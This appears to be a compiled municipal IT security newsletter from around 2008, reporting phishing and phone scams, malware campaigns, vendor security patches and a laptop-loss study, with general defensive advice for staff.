The Latest E-Mail Scams
We're seeing similar trends in the SPAM that the City is blocking as we have the last few weeks. By far the greatest number are some kind of debt consolidation, etc. with the next runner up being the online pharmacy offers. We've also seen a rise in the SPAM relating to the Bank closures, with subject lines like "Wachovia Connection Alert, or WAMU Customer Information".

However, there have been several new virus infected emails blocked. Some were of the old, "You have an e-card" variety, and in the last two days we've seen one with the subject line, "Angelina Jolie Free Video" and one titled, "Funds wired into your account are stolen". We also had some instances of a virus laden email with a "doc.zip" attachment and the subject, "Important document for 49". And then, of course, there have been several nasty malware laden presidential campaign videos being foisted upon us recently.

If you receive a suspicious email, simply delete it.

E-mail Claiming to Be From the FDIC
The Federal Deposit Insurance Corporation (FDIC) has received numerous reports of a fraudulent e-mail that has the appearance of being sent from the FDIC. The subject line of the e-mail states: "Funds wired into your account are stolen." The e-mail tells recipients that the proceeds of identity theft crimes have been wire-transferred into their bank account. The e-mail then directs recipients to open and review an attached copy of their bank account statement. The attached file is actually an unknown executable file.

Recipients should consider the intent of the executable file as a malicious attempt to collect personal or confidential information, some of which may be used to gain unauthorized access to on-line banking services or to conduct identity theft.

The FDIC does not issue unsolicited e-mails to consumers. Financial institutions and consumers should NOT open the executable file attached to the fraudulent e-mail.

Attackers Mix Online, Offline Exploits to Mask Financial Fraud
Professional cybercriminals are deploying multichannel attacks that split the attack cycle into pieces that may not look like they are related. This combination of offline and online activity lets the attacker stay under the radar of forensics or other incident tracking, for instance, using wire transfers and ATM transactions, as well, rather than a pure online transaction with a bank. One example of this type of attack is the Coreflood botnet Trojan, which is notorious for performing reconnaissance on its victims. Coreflood has stolen user account information, Webpage content, digital credentials, and browser cookies. And it made sure the server it used appeared to be from the same geographic location as the victim.

Banking customers can protect themselves from these multipronged — and often silent — attacks with the usual best practices: updated antivirus and anti-spyware, patching one’s machine, and never clicking on an email purportedly from a financial institution.

Symantec Warns of Alarming Spam Trends
Symantec’s monthly State of Spam report claims that malware-laden messages are far more common than in the first half of the year. The security firm estimates that 1.2 percent of all email messages sent contain a malicious payload. Overall, Symantec found that spam comprises some 78 percent of the global email volumes.

While attached .zip and .rar archives were the most popular method for spreading malware, researchers also found that embedding attack code within the source code of the message itself is becoming popular. ”The increase began in May 2008 and continues to the present,” the company said in the report. ”During this period, there has also been an increase in email messages carrying malware payloads, not just links to malicious code.” The majority of the malicious payloads were generic Trojan, downloader and information stealing applications.

Barclays Hit by Phishing Scam
Barclays is the latest bank to be hit by a hoax phishing campaign, which encourages customers to log their personal details on to a fake site. The email scam entitled, ‘restore your account’ encourages consumers to click on to a hoax Barclays log-in site, in a bid to extract personal banking details. Barclays denies having anything to do with the email.

The bank is urging customers to delete the email or forward it on to Barclay's internet security address.

Malware Masquerades as YouTube Video
Security experts are warning users of a new malware attack posing as a pornographic YouTube video. Researchers at McAfee said that the newly-discovered attack attempts to lure the user to a malicious site by way of a YouTube page promising an adult movie.

YouTube’s terms of service prohibit the posting of obscene content, and the company removes videos it deems inappropriate. But the attack does not actually post the videos on YouTube. Instead, the attackers have constructed a fake YouTube user account. Forum spam messages are then used to link to the profile pages, which in turn offer ‘video’ links hosted on an external site. Believing the page to be hosting a legitimate YouTube video, the user follows the link which attempts to perform a number of browser exploits as well as a fake codec attack in which the user is told that an ‘additional file’ is needed to display the video

Google Trends Used to Propagate Malware
Researchers at Webroot have discovered that malware operators have begun using Google Trends information to assist in malware propagation attempts. By abusing popular blog hosting sites such as Windows Live Spaces and applying Google Trends data on popular search terms, operators are able to increase the chance of a victim selecting a malicious web site during a search.

Free Security Scan Tool from Verizon
With industry estimates of more than a million viruses stalking the unprotected computers of Internet users, the need for adequate protection from these and other threats has never been greater. Verizon Security Advisor provides consumers with a fast and simple way of determining their level of risk and follows up with tips and instructions on how to stay out of trouble.

Internet users can access the free security scan at http://www.verizon.net/securityadvisor

Verizon also offers its customers free parental controls and has launched a publicly available Parental Control Center offering tips and tools for parents on how to protect their children when they're online. The Parental Control Center features simple downloading of the parental-control software (if you're a customer) and tutorials on subjects such as Social Networking and Safe Surfing for Kids.

Links are available to Web sites for organizations like WiredSafety, the largest cybersafety organization, and the National Center for Missing and Exploited Children's Cyber Tipline. The center is available at http://www.verizon.net/parentalcontrol.

Two New iPhone Security Flaws
Security researcher Aviv Raff disclosed two Iphone security flaws last week that could allow attackers to trick users into unknowingly surfing to malicious destinations.

He had brought both vulnerabilities to Apple's attention way back in July but the company failed to address them with patches, so he had no choice but to publicly disclose the flaws.

The first flaw exists in Iphone's Mail application and its Safari web browser, which tend to truncate parts of long URLs when they're displayed. That can allow evil-doers to disguise malicious URLs without the user having a chance to view them.

"In most mail clients... you can just hover [over] the link and get a tooltip [showing] you the actual URL that you are about to click," explained Raff. "In iPhone it's a bit different. You need to click the link for a few seconds in order to get the tooltip. Now, because the iPhone screen is small, long URLs are automatically cut off in the middle."

He explained that it's possible for a blackhat to devise a long URL beginning with a trusted domain name but which actually point to an entirely different location. The Iphone user would only see the familiar-looking part of the domain name and therefore might easily be tricked into clicking on a malicious link.

Raff said Iphone Mail is also vulnerable because it automatically downloads images linked in HTML-formatted emails.

Most email client software allows users to make downloading of images require approval in each instance. Setting that option helps email users protect themselves against spammers, because spammers can learn when they've reached an active email account if the recipient opens a spam email and downloads images.

"This one is not just a trivial bug," Raff said. "It's actually a pretty dumb design flaw, which was already fixed by all other mail clients ages ago."

Researcher Finds Evidence of Massive Website Compromise
Several criminal gangs have acquired administrative log-in credentials for more than 200,000 Web sites — including the one used by the U.S. Postal Service — and have used the compromised domains to attack unsuspecting users’ PCs with a notorious hacker exploit kit, a researcher said Friday.

More than a month ago, the director of security research at Aladdin Knowledge Systems Inc. found and infiltrated a server belonging to a longtime customer of Neosploit, a hacker tool kit used by cybercriminals to launch exploits against browsers and popular Web software such as Apple Inc.’s QuickTime or Adobe Systems Inc.’s Adobe Reader. On that server, he uncovered logs showing that two or three hacker gangs had contributed to a massive pool of Web site usernames and passwords.

“We have counted more than 208,000 unique site credentials on the server,” he said, “and over 80,000 had been modified with malicious content.” The site credentials were only the means to an end: The 80,000 modified sites were used as attack launchpads. Each served up exploit code provided by the Neosploit kit to any visitor running a Windows system that had not been fully patched.

Remember to keep your operating systems and applications patched and up to date.

Most U.S Hotels Vulnerable to Malicious Attacks
Most U.S hotels are vulnerable to malicious attacks and are "ill prepared" to protect their guests from internet security problems, claims a study published by Cornell University.

The study, “Hotel Network Security: A Study of Computer Networks in U.S. Hotels” examined the security of 147 hotels through surveys, interviews and on-site testing.

“Many hotels have flaws in their network topology that allow for exploitation by malicious users, thereby resulting in the loss of privacy for guests,” the study says.

For guests, Ogle recommended connecting to the internet using a Virtual Private Network (VPN), having updated anti-virus and firewall software and making sure each secured website starts with “https://” rather than “http://”.

Smartcard Hack
Boffins (finally) publish hack for world’s most popular smartcard. Two research papers published Monday have finally made it official: the world’s most widely deployed radio frequency identification (RFID) smartcard - used to control access to transportation systems, military installations, and other restricted areas - can be cracked in a matter of minutes using inexpensive tools.

One paper - published by researchers from Radboud University in Nijmegen, The Netherlands - describes in detail how to clone cards that use the Mifare Classic. The chip is used widely throughout the world, including in London’s Oyster Card, Boston’s Charlie Card, and briefly by a new Dutch transit card.

Manufacturer NXP and the Dutch government had tried in vain to prevent the researchers from disclosing their findings, arguing that the findings would enable abuse of security systems that rely on the card.

WinZip Releases Version 11.2 SR-1
WinZip has released version 11.2 SR-1 to address a vulnerability. This vulnerability is due to flaws in the "gdiplus.dll" library included with the affected versions of the software. Exploitation of this vulnerability may allow an attacker to execute arbitrary code.

US-CERT encourages users and administrators to review the WinZip 11.2 SR-1 release notes and apply any necessary updates to help mitigate the risks.

Apple Issues Java updates
Apple has issued updates for the Java components of its two most recent OS X releases. The three security fixes address a total of 38 Common Vulnerability and Exposure (CVE) entries in Java. Each of the fixes addresses errors which could lead to remote code execution.

Apple said that the errors contained both Mac-specific and Java-specific flaws. While Sun Microsystems develops and maintain Java software for several operating systems, Apple is among the vendors that have opted to develop Java components in-house.

The Latest E-Mail and Web Scams
There have been a rash of new email and website scams, some of which we will address in this newsletter. Some of the new phishing scams take advantage of all of the frightening economic and housing news. Criminals are sending out emails with subject lines such as "Foreclosure Assistance", or "Debt Relief", and new ones today titled "Merill Lynch Customer Support" and "Merrill Lynch Update". Expect some soon titled, "WAMU Update". The City's email filtering software, Postini, is catching most of these, but some may make it through or you might inadvertently release them from Postini. These will either infect your computer directly or give you a link to a poisoned web site.

We are also seeing many instances of legitimate web sites that are infected. These sites pop-up a message saying that your computer has a virus along with an offer of an antivirus you can download. These are AV applications fake, and in fact will infect your computer with a Trojan (a malware application that takes over control of your computer).

There are several other new scams that take advantage of recent news, including ones about the presidential election, Dept of Homeland Security and hurricane relief. And finally, the "You have an e-greeting" has resurfaced.

If you receive a suspicious email, simply delete it. If you get a pop-up on a web site about an antivirus program, shut down your web browser immediately.

Infected Software Fakes on the Rise
Spam e-mail that contains links to malware bearing viruses and Trojans are on the increase, particularly those disguised as legitimate software, security vendors warn.

One common ruse involves the circulation of fake copies of popular software, which infects users’ systems upon installation. In a statement Wednesday, Symantec pointed to the example of a “very high profile attack” involving fake versions of Microsoft browser, Internet Explorer 7.

Adobe also recently issued a warning that fake copies of its Flash plugin had been circulated via fake news video pages that prompt users to download the malware. Ironically, another IT security company Sophos, noted that Symantec itself fell victim to such hoaxes.

Malware Poses as iPhone Game
Malware writers are spamming e-mails with a file posing as a popular iPhone video game, according to researchers at Sophos. In fact, the file contains a Trojan, which ironically only runs on Microsoft Windows. Still, Sophos said the Trojan can potentially allow a hacker to take over an infected PC.

The Trojan, identified by Sophos as Troj/Agent-HNY, is being spread via e-mail as an attachment dubbed Penguin.Panic.zip after the popular “Penguin Panic” game for the iPhone. Hoping to snare unsuspecting video game fans, the spam e-mails contain subject lines such as “Virtual iPhone games!” and “Apple: The most popular game!”

“It’s your bog-standard malicious Trojan horse, designed to hand control of the compromised computer over to a third-party hacker,” said the senior technology consultant at Sophos. “That hacker can then take over the compromised PC to download further malware, or launch spam campaigns, install spyware to steal your identity or launch a distributed denial-of-service attack. Because so many Trojan horses these days download additional code from the Internet, hackers can change the ultimate payload at anytime they wish – they just update the file which the Trojan tries to download.”

Fake Celebrity Websites Infecting With Malware
Attacks through phony celebrity websites have continued to spawn. According to new data from McAfee, a user searching for a variety of items (wallpapers, screensavers, photos, etc.) relating on one specific celebrity has, on average, an 18 percent chance of encountering malware in one form or another. Such malware is often served up by a “fake” celebrity website whose primary purpose is to shove Trojans and worms into the desktops of the unwary. These websites differ from standard malware landing pads, as they try to appear as a legitimate source of news.

The Most Dangerous Celebrities To Google
Brad Pitt has overtaken Paris Hilton as the most dangerous celebrity to search for in cyberspace according to Internet security company McAfee. For the second year running, McAfee entered the glamorous world of Hollywood to reveal the riskiest celebrities in cyberspace.

Checking in on your famous friends is not only a guilty pleasure, but seriously dangerous for your PC. Fans searching for "Brad Pitt," "Brad Pitt downloads," and Brad Pitt wallpaper, screen savers and pictures have an 18% chance of having their PCs infected with online threats, such as spyware, spam, phishing, adware, viruses and other malware.

Cybercriminals are using A-listers' names and images, like Beyonce and Justin Timberlake, to lure Internet users who surf the Web for the latest gossip, screen savers and ringtones to "fake" Web sites that look legitimate.

Actors Brad Pitt and Justin Timberlake are the most dangerous men to seek on the Internet, while Beyonce and Heidi Montag top the list for women. Paris Hilton, who topped 2007's most dangerous celebrities, is noticeably absent from this year's list. Also absent is Britney Spears who was ranked #4 in 2007.

Clickjacking - a New Attack Vector on the Web
Public reports of a new attack vector, referred to as "clickjacking," which affects most web browser applications. According to multiple vendors and security researchers, this method could cause a browser to follow malicious links without the user's knowledge or consent, even when all common scripting functions (javascript, ActiveX) have been disabled. The details of the attack vector and accompanying proof-of-concept exploit code have not been made public at this time.

Business Week Web Sites Compromised
The Web site of BusinessWeek magazine suffered a major SQL injection attack in recent days that left it hosting malware on hundreds of its pages. Once compromised by such a server weakness, the attack scripts could, in principle, launch anything desired by the attacker except currently included code for automatic attacks based on JavaScript. That means a visitor could be hit by malware just by landing on one of the pages, without even interacting in any way. Luckily, according to Sophos, the code that's still on the magazine site pointed to a Russian site that appeared to be nonfunctioning. A similar attack was used earlier in 2008 to undermine 500,000 legitimate Web sites in a period of days.

Letter Scam - Pay Taxes on the Money You "Won"
A new snail mail letter scam urges recipients to pay taxes on money ‘won’. The Waterford, New York, Office of the Public Safety Commissioner is warning residents to beware of a scam designed to lure letter recipients into paying taxes on money the letter claims they won. A Waterford resident received the letter, which claims the recipient won $125,000. The letter goes on to say the recipient can claim the cash once he or she pays $2,975 in taxes. The letter asks the recipient to send the money through Western Union or Moneygram. A check is included for $4,875, but the letter asks the recipient to call before cashing it. Police say the letter was sent as a mass mailing, and recipients should disregard it.

Mozilla Patches 11 Bugs in Firefox
Mozilla Corp. late Tuesday patched 11 vulnerabilities in Firefox 3.0, more than half of them labeled “critical,” and fixed 14 flaws in the older Firefox 2.0.

Firefox 3.0.2 quashes six critical bugs, four marked “high,” and one pegged as “low” in Mozilla’s four-step threat ranking system. Among the most serious were four stability bugs in the browser’s graphics rendering, layout and JavaScript engines that can crash the progra, and might be exploitable with malicious code. “Some of these crashes showed evidence of memory corruption under certain circumstances and we presume that with enough effort at least some of these could be exploited to run arbitrary code,” said Mozilla in the accompanying advisory.

Mozilla also updated the older Firefox to 2.0.0.17, patching all but one of the bugs fixed in 3.0.2, but also addressing several issues specific to the aging browser.

Apple Releases Java Updates for Mac OS X 10.4 and 10.5
Applehas released updates for Java for Mac OS X 10.4 and 10.5 to address multiple vulnerabilities. These vulnerabilities may allow an attacker to execute arbitrary code. US-CERT encourages users to review Apple Article HT3178 and HT3179 and apply any necessary updates to help mitigate the risks.

Is Your Webcam Watching YOU!?
Cover your webcams and unplug your microphones, because the latest freely-available hacker tools could use your own hardware against you without your knowledge.

Security specialist Prevx demonstrated some of the latest scary techniques being used to take unsuspecting web users' credit card details, passwords and personal information, as well as turn on your webcam and watch you.

Worryingly, something as simple as a failure to update Adobe Acrobat reader and then clicking on the wrong PDF file could put your PC at risk, and the real concern is the increase in 'zero day exploits' – unpublicised or previously unknown exploits that allow hackers to seize control of computers.

Some New E-Mail Scams
We're all familiar with e-mail spam offering prescription drugs, cut-rate software and herbal potions.

But spammers are becoming increasingly sophisticated in delivering their ploys. Appearing new this summer was e-mail with the subject lines "Get help today with Drug Rehab Info" or "Overcome Alcoholism Today" illustrated with photographs of people who seem depressed

"It's one of their more sinister attacks," said Dermot Harnett, the editor of a new report from Symantec. "If you open it, it will bring you to a sign-up page asking for your name, address and e-mail information. It's the first step in trying to get credit card information."

As always we remind you to remain skeptical and make sure all your friends and especially those most vulnerable, know that if it seems to good to be true, it probably is.

Hit Man E-Mail Scam Returns
The IC3 (the FBI and DOJ's online internet crime reporting site) continues to receive thousands of reports concerning the hit man e-mail scheme. E-mail content has evolved since late 2006; however, the messages remain similar in nature, claiming the sender has been hired to kill the recipient.

Two new versions of the scheme began appearing in July 2008. One instructed the recipient to contact a telephone number contained in the e-mail and the other claimed the recipient or a "loved one" was going to be kidnapped unless a ransom was paid. Recipients of the kidnapping threat were told to respond via e-mail within 48 hours. The sender was to provide the location of the wire transfer five minutes before the deadline and threatened bodily harm if the ransom was not received within 30 minutes of the time frame given. The recipients' personally identifiable information (PII) was included in the e-mail to promote the appearance that the sender actually knew the recipient and their location.

In some instances, the use of names, titles, addresses, and telephone numbers of government officials, business executives and/or victims' personally identifiable information are used in an attempt to make the fraud appear more authentic.

Individuals who receive e-mails containing threats of violence and their PII are encouraged to contact law enforcement as well as file a complaint at www.IC3.gov.

Experts Warn of Hurricane-related Website Scams
with all of the recent hurricane activity, internet users are being reminded that not every storm-related website is a benign one.

For the past several days, handlers at the SANS Internet Storm Center have listed scores of recently launched websites that refer in some way to Gustav, Hannah or Ike.

"Many of the domain names being registered are legitimate and are redirecting to sites that support law-abiding charities," Marcus Sachs, the Storm Center's director, wrote Monday in a blog post. "Unfortunately though, many more are either parked in a 'for sale' status, or are associated with IP addresses known to host malicious software, spyware, or other hazardous content."

Buying up domain names that refer to popular news events is not uncommon, as individuals hope to either sell the domains or earn money through click-through advertising revenue.

However, sometimes their motives turn malicious, as was evidenced for the first time on a widespread basis following Hurricane Katrina. In that case, a number of bogus websites popped up that claimed to be legitimate charities, such as the American Red Cross.

Individuals are advised to be wary of emails that appear as requests to donate money to a legitimate donation. Users should consult the Better Business Bureau's list of charities to affirm an organization's legitimacy.

E-Mail Survey Scam
This is another case of a new scam that is happening elsewhere but could very well be seen here soon.

An e-mail survey sent to Grants Pass, Oregon, area residents that offered $90 to answer questions for a bank turned out to be a scam run electronically from Valencia, Spain. The e-mail used a phony Home Valley Bank logo and asked for personal information the real bank says it would never request by phone or e-mail. And the scam hijacked a phone number for a health care organization in Wisconsin as its fake contact number, forcing the organization to waste time answering a number of angry phone calls before the scam was discovered.

Home Valley Bank has blocked any transactions involved with the scam.

Scam Targets Time Warner Cable Customers
Hundreds of people have already been affected by a new phishing scam that tries to get personal information over the internet and is targeting cable-TV customers. It comes in the form of an email that appears to be from Time Warner Cable. Time Warner has received more than 200 or emails related to the phishing scam. A spokesperson for Time Warner told News 4 the company would never send out an email asking for personal information or bank/credit card account information.

Phishing Scam Targeting Bank of America Customers
The Altamonte Springs, Florida, Police Department announced that the Bank of America Fraud Response team is currently investigating an e-mail “phishing” scam that attempts to obtain unauthorized access to banking software including Bank of America Direct. Recent fraudulent e-mails appearing to be from Bank of America have been identified as phishing e-mails.

The e-mail may ask customers to verify confidential account information by clicking on a Customer Verification Form with a fraudulent link provided in the e-mail. The message may refer to a required or mandatory confirmation necessary for a routine software upgrade.

E-Mail Scam Targeting Law Firms Ensnares a Lawyer in Atlanta
I just include this to emphasize that fact that anyone can become a target in this battle, and just because you went to a lot of college, doesn't mean you can't be fooled.

A lawyer in Atlanta who often handles legal transactions with Asian clients and often via email, was understandably fooled by an email from Taiwan asking him to help collect a debt in the United States.

The "debtor company" sent him a cashier's check for nearly $200,000 and he depositied it in his trust account before wiring the money to a South Korean bank. The check, of course, was counterfeit.

The Attorney waited three days after the check was deposited before wiring the money, as his bank had told him that was enough time to ensure the check had cleared. However, the scammers had changed the nine-digit routing number at the bottom of the check so that it was wired to a different bank then the one named, resulting in a delay in processing. The Lawyer's bank is now sueing him for the money claiming that it extended him provisional credit when it wired the money to South Korea.

The scammer identified itself as Tah Tong Textile Co., a real company that trades on the Taiwanese stock exchange. However, the attorney now says he's pretty sure there is no connection between that company and the scammers who contacted him.

There are reports of at least seven more attorneys who have fallen prey to similar email scams across the country.

Apple Confirms iPhone Security Bug, Promises Patch
Apple Inc. today said it will patch a bug in the iPhone's password-protected locking feature next month in a software update for the iconic smart phone.

In the meantime, Apple suggested users apply the work-around recommended by several users on the Apple support forum. "[Set] the iPhone so that double-clicking the home button will take the user directly to the home screen, which if password protection is turned on, will be the unlock the screen,"

The flaw lets anyone sidestep iPhone passcode locking by simply tapping "Emergency Call" on the password-entry screen, then double-tapping the Home button.

By default, a double-tap of the Home button brings up the iPhone's Favorites, a list of frequently called contacts, and those contacts' information, including phone numbers and addresses. If any of the contacts have e-mail or Web addresses associated with them, the trick allows access to the iPhone's e-mail application and Safari browser, respectively.

The bug also affects the iPod Touch.

Fake Twitter Profile Punts Orkut Attack
Miscreants are using a fake Twitter profile in a bid to spread malware that harvests login credentials for Orkut.

Updates to the fake Twitter profile are supposedly being followed by 17 punters, but they're all fake, according to Chris Boyd, director of malware research at IM security firm Facetime.

The profile is designed to trick would-be marks into viewing a photo album on Orkut, which supposedly requires a Flash update to view. This bogus Flash update is contaminated by malware, specifically the OrkutTron Trojan.

OrkutTron performs a variety of malicious actions including an attempt to snaffle login credentials for Orkut, the Google-run social networking site that's particularly big in Brazil. Fitting in with this theme, the fake Twitter profile is written in Portuguese.

Attacks targeting Orkut are relatively commonplace, but as Boyd notes, the use of Twitter represents an innovation in such hacking attacks.

VMware Delivers Fixes for Multiple Flaws
VMware, provider of virtualization solutions, has released updates for 16 vulnerabilities across its product line.

The flaws affect VMware Workstation, Player, ACE, Server and ESX.

Three of the bugs are related to errors in ActiveX controls, Internet Server Application Programming Interface (ISAPI) and OpenProcess.

The French Security Incident Response Team rated the vulnerabilities "moderate risk." US-CERT encourages users to update to the latest versions.

Phone Phishers Using Illegal File Sharing Legal Threats
Fraudsters have begun cold-calling householders to accuse them of copyright infringement online and threaten them with court action, an ISP has reported.

Small ADSL provider UKFSN received a support call yesterday from an elderly customer who was concerned after being contacted by a scammer on Tuesday.

Accused of illegally sharing music, UKFSN's subscriber was savvy enough to refuse to give any details, and turned the tables on the caller, demanding to know where they were calling from. When they refused to provide credentials he hung up.

Many observers predicted that fraudsters would seize on lawyers' highly-publicised efforts to extract cash from internet users. And lo, it has come to pass. Email phishers can't be far behind.

Google Issues First Patches for Chrome
Just days after it rolled out Chrome, Google Inc. issued an update after Vietnamese security researchers reported a critical vulnerability in the beta browser.

Google patched the vulnerability Sunday and released an updated beta, Version 0.2.149.29, the same day. "We've released an update to Google Chrome that fixes many of the issues reported here," said someone identified only as "Simon" in a Chrome support forum yesterday.

Other Chrome vulnerabilities, however, remain unpatched. The blended threat that relies on the months-old "carpet bomb" bug first reported in Apple Inc.'s Safari -- which, like Chrome, uses the WebKit browser engine -- has not been fixed, for instance.

Already-installed copies of Chrome will update automatically to 0.2.149.29; Google's browser uses a behind-the-scenes update process that doesn't inform the user that an update is about to be installed. "Google Chrome automatically updates to a newer version when one is released," the company said in a support document. "The update process happens silently, whether or not you're using the browser at the time. If Google Chrome is open at the time of the update, you must close the browser and restart for the new version to launch."

Users can manually update Chrome by selecting the Tools icon at the far right, then choosing "About Google Chrome." An Update button will appear if a newer version is available.

Microsoft Patch Tuesday - Four Major Updates
Microsoft has confirmed that its Patch Tuesday release on 9 September will include fixes for four 'critical' remote code execution vulnerabilities.

Affected software includes Microsoft Office, Windows, Internet Explorer, .NET Framework, SQL Server and Visual Studio. Most of updates do not require a full restart of the PC.

Microsoft will host a webcast to address customer questions on these bulletins on 10 September.

Most Common E-Mail Scams This Week
We saw a resurgence this week of the "You have received an e-greeting" e-mail scam. The various types of debt relief scams were also widespread.

These debt related email scams came with a huge variety of subjects, including, "debt relief", "christian debt relief", "south carolina [and other states] debt consolidation", "debt buster", "debt reduction", "consolidating debt", "get out of credit card debt", "tenant debt consolidation", "unsecured debt consolidation loan", "debt consolidation loans for people with bad credit", "help to get out of debt", etc. etc.

We also saw several cases of online pharmacy scams with subject lines similar to: "Never be ripped off by a doctor again", or "Get all of your pharmacy needs online".

As always we remind you to remain skeptical and make sure all your friends and especially those most vulnerable, know that if it seems to good to be true, it probably is.

BBB Warns Against Credit Union Scam
These next two reports from outside our area are ones that we've seen more and more often. Be aware of these types of scams because they are very likely to be tried here.

Connecticut Better Business Bureau (CT BBB) has learned of a scam targeting customers of the Commonwealth Credit Union. CT BBB reports the scam has made its way from Kentucky to Connecticut. Commonwealth CU has been the target of an extensive “voice-fishing” scam. A recorded message tells clients their credit cards have been suspended, asks them to call a toll-free telephone number, and once they do, they are asked for their credit card numbers to “reactivate” their accounts. Both members and non-members of Commonwealth CU have received these calls on their cell, work and home phones. The Kentucky Attorney General cautions against responding to the message.

Commonwealth Credit Union confirms it never makes calls asking for personal information. On its website, Commonwealth acknowledges the voice phishing scam, and says thousands of people in Kentucky alone have been targets of these attacks. Among the toll-free numbers victims are asked to call is one based in Columbia,

West Virginia Warns About Phony Debt Collectors
Consumers in West Virginia who at one time obtained payday loans over the Internet – and even those who never borrowed money at all – have been getting threatening phone calls from alleged debt collectors.

West Virginia’s attorney general says the debt collectors are actually scam artists. Internet payday loans are short-term loans or cash advances, usually for 14 days, made over the Internet via interactive web sites and secured by an agreement authorizing debits of the loan and all fees owed from the consumer’s checking account. These loans typically charge interest rates ranging from 600-800 APR and are unlawful in West Virginia.

The scam artists, who speak English with a foreign accent, call themselves “U.S. National Bank,” “Federal Investigation Bureau,” “United Legal Processing” and numerous other phony names. They refuse to disclose real names and addresses and are believed to be operating “off the grid” from homes, automobiles, or from off shore locations or foreign countries, including India. Since the scammers have kept themselves purposely well hidden, the official says no law enforcement agencies have succeeded in locating or shutting them down.

The scammers typically pose as law enforcement officers, investigators, lawyers, and bankers and threaten consumers that they will be arrested for “bank fraud” or other fictitious crimes unless money is wired immediately. The scammers almost always call consumers at work several times a day, and tell their supervisors, “Your employee has committed fraud and is about to be arrested.” Such threats have proven unsettling even to the most savvy consumers and employers who suspect the calls are fraudulent.

Both of these types of attacks are becoming quite prevalent nationwide, so be aware and avoid becoming a victim.

Hackers Resort To 'Sick' Kidnap Spam
Hackers are claiming they have kidnapped children in a bid to infect PCs with a Trojan Horse virus, says Sophos, and antivirus vendor and security firm.

The security firm is warning users that emails entitled 'We have hijacked your baby' are being sent to Web users around the globe. As well as asking for a US$50,000 ransom for the 'release' of the child, the messages also contain an attachement supposed to be a photograph of the child. Instead the file actually contains a deadly Trojan Horse that will steal personal information.

"Receiving or reading these widespread emails themselves does not mean you are infected, but if users open the attachment they will be infecting their Windows computer, they will give hackers an open door to take control and steal information," said Graham Cluley, senior technology consultant for Sophos.

"There's no other way of putting it - this attack is sick. Hackers have no qualms about exploiting a family's natural instinct to defend its most vulnerable members," added Cluley.

Apple Forgets To Fix iPhone Passcode Bug.
An iPhone bug that Apple Inc. patched last January to stop unauthorized users from bypassing the password-protected locking feature has resurfaced in newer versions of the phone’s software. The bug also affects the iPod touch.

First reported yesterday by a user identified as “greenmymac” on the MacRumors forum, the flaw lets anyone sidestep passcode locking by simply tapping “Emergency Call” on the password-entry screen, then double-tapping the Home button. That leads to the iPhone’s Favorites, a list of frequently-called contacts, and their contact information, including phone numbers and addresses. If any of the contacts have e-mail or Web addresses associated with them, the trick also allows access to the iPhone’s e-mail application and Safari browser, respectively.

If you use an iPhone or one of the other effected platforms, make sure to stay tuned to Apple for a fix for this, expected very soon.

Ubuntu Issues Warning, Urges Users To Upgrade
If you are an Ubuntu user, you may want to take note that the company has issued a warning to all its users to make sure they are using the latest version of the distro.

Due to a security flaw, the vendor has warned that all versions from Ubuntu 6.06 onwards to 8.04 are vulnerable to a local security exploit that could result in system compromise once the attacker gains access to root.

The flaw is not a remote vulnerability. The attacker would have to have an account on the system in question in order to attempt the exploit, the result of which could range from crashing the system to compromising its data. The issue affects multiple editions of Ubuntu, including Kubuntu, Edubuntu and Xubuntu.

Canonical sent the warning email earlier this week. If you are using an older version of Ubuntu, now is a good time to update.

E-Mail Scam Targeting Law Firms Ensnares a Lawyer in Atlanta
I just include this to emphasize that fact that anyone can become a target in this battle, and just because you went to a lot of college, doesn't mean you can't be fooled.

A lawyer in Atlanta who often handles legal transactions with Asian clients and often via email, was understandably fooled by an email from Taiwan asking him to help collect a debt in the United States.

The "debtor company" sent him a cashier's check for nearly $200,000 and he depositied it in his trust account before wiring the money to a South Korean bank. The check, of course, was counterfeit.

The Attorney waited three days after the check was deposited before wiring the money, as his bank had told him that was enough time to ensure the check had cleared. However, the scammers had changed the nine-digit routing number at the bottom of the check so that it was wired to a different bank then the one named, resulting in a delay in processing. The Lawyer's bank is now sueing him for the money claiming that it extended him provisional credit when it wired the money to South Korea.

The scammer identified itself as Tah Tong Textile Co., a real company that trades on the Taiwanese stock exchange. However, the attorney now says he's pretty sure there is no connection between that company and the scammers who contacted him.

There are reports of at least seven more attorneys who have fallen prey to similar email scams across the country.

BitRoll and Torrent101 Used to Distribute the Lop Adware
Panda Security today announced that PandaLabs, Panda Security's laboratory for detecting and analyzing malware, has discovered two spoof P2P application installers, BitRoll-5.0.0.0 and Torrent101-4.5.0.0 that are being used to install the Lop adware on users' systems. These programs are used to exchange files between remote users and both these installers are available for download on the Internet, so any user could access them and become infected.

The Lop adware is designed to display ads from various advertisers through pop-up windows, banners, etc. It also switches the Internet Explorer home page to its own search engine. When searches are made with this engine, the results returned will be advertising pages related to the search words.

Other false applications are also being used by cyber-crooks to install malicious code, such as a program called wavesoftwarecreative.exe (which passes itself off as audio software) or another called bitdownloadsetup.exe.

To help prevent detection, this adware connects periodically to a Web page from which it downloads new files containing variants of the code and making it difficult to delete all active malicious files on the system. If users try to use the program installed, they will be able to search for files but not download them.

"Very often, users unwittingly 'consent' to installing adware through clauses in the license agreements of other programs," explains Luis Corrons, technical director of PandaLabs. "In this case however, there is no mention in the agreement about the installation of Lop."

The Case of the 12,000 Lost Laptops
Business travelers are losing more than 12,000 laptops per week at U.S. airports. Only one-third of those are reclaimed, according to a study by the Ponemon Institute, sponsored by Dell.

At the same time, more than 53 percent of polled business travelers say their laptops contain confidential or sensitive information, and 65 percent of these travelers admit they do not take steps to protect or secure the information contained on their laptop.

Companies are dependent on a mobile workforce with access to information no matter where they travel. This mobility, however, is putting companies at risk of having a data breach if a laptop containing sensitive information is lost or stolen.

To gather more information about this concern, the Ponemon Institute conducted field research at 106 major airports in 46 states and surveyed 864 business travelers in an airport environment. The airports with the highest number of lost, missing or stolen laptops include: Los Angeles International, Miami International, Kennedy International and Chicago O’Hare. While Adanta’s Hartsfield- Jackson International is the busiest airport in the United States, it is tied for eighth place (with Washington’s Reagan National) for lost, stolen or missing laptop computers.

According to the study, the types of company information contained on business travelers’ laptop computers include customer or consumer data (47 percent), business confidential information (46 percent), intellectual property such as software code, drawings or renderings (14 percent), and employee records (13 percent). The average business cost when confidential personal information is lost or stolen is $197 per record, says the Ponemon Institute. Even one missing laptop, however, can become a serious problem for any organization.

New Online Encyclopedia of Internal Network Threats
